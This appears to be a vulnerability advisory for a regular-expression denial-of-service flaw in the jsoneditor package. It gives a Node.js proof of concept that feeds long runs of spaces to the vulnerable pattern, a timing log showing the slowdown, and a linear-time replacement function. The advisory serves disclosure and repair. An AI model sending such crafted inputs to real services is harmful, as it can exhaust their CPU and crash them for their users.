The jsoneditor package is vulnerable to ReDoS (regular expression denial of service). An attacker who is able to provide a crafted element as input to the getInnerText function may cause an application to consume an excessive amount of CPU.
Below is the pinned line using the vulnerable regex.
Reproducer, where we've copied the relevant code:
Put the code below in a poc.js file and run it with node:
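// Pattern copied from the package; the payload below contains no "\n", so it never matches.
var regex = /\s*\n\s*/g;
for (var i = 1; i <= 500; i++) {
    var time = Date.now();
    // "A" + a long run of spaces + "Z"; the run grows by 10000 characters each iteration.
    var payload = "A" + " ".repeat(i * 10000) + "Z";
    regex.test(payload);
    var time_cost = Date.now() - time;
    console.log("Trim time : " + payload.length + ": " + time_cost + " ms");
}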
Check the output:
Trim time : 10002: 102 ms
Trim time : 20002: 421 ms
Trim time : 30002: 927 ms
Trim time : 40002: 1693 ms
Trim time : 50002: 2659 ms
Trim time : 60002: 3945 ms
Trim time : 70002: 5472 ms
Trim time : 80002: 7407 ms
Trim time : 90002: 8342 ms
Trim time : 100002: 10267 ms
Trim time : 110002: 13306 ms
This vulnerability can exhaust system resources and lead to crashes.
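The timings above grow roughly quadratically because, from every start position inside the run of spaces, the leading \s* consumes the rest of the run and then backtracks looking for a "\n" that is not there. As an added example (not jsoneditor's code or its fix), the function below does the same job in a single pass, assuming the pattern is used to collapse whitespace runs that contain a line break; collapseNewlineRuns, isSpace and timeOnPocShape are hypothetical names.

```javascript
// Added example: linear-time stand-in for text.replace(/\s*\n\s*/g, replacement).
// collapseNewlineRuns and isSpace are hypothetical names, not jsoneditor code.
const WS = /\s/; // single-character class: nothing to backtrack over
const isSpace = (ch) => WS.test(ch);

function collapseNewlineRuns(text, replacement = '') {
  const out = [];
  let chunkStart = 0; // start of the not-yet-copied text
  let i = 0;
  while (i < text.length) {
    if (!isSpace(text[i])) { i++; continue; }
    // Walk one maximal whitespace run exactly once, noting any line break.
    let j = i;
    let sawNewline = false;
    while (j < text.length && isSpace(text[j])) {
      if (text[j] === '\n') sawNewline = true;
      j++;
    }
    // The greedy pattern matches the whole run, but only if it holds a "\n".
    if (sawNewline) {
      out.push(text.slice(chunkStart, i), replacement);
      chunkStart = j;
    }
    i = j; // never rescan the run: this is what keeps the scan linear
  }
  out.push(text.slice(chunkStart));
  return out.join(''); // replacement is inserted literally (no "$&" expansion)
}

// Constructed input in the PoC's shape: no "\n", so nothing is replaced.
function timeOnPocShape(spaces) {
  const payload = 'A' + ' '.repeat(spaces) + 'Z';
  const start = Date.now();
  const result = collapseNewlineRuns(payload);
  return { unchanged: result === payload, ms: Date.now() - start };
}

console.log(timeOnPocShape(100000));
```

If only a yes/no answer is needed, as with regex.test in the reproducer, text.includes("\n") gives the same result as the pattern.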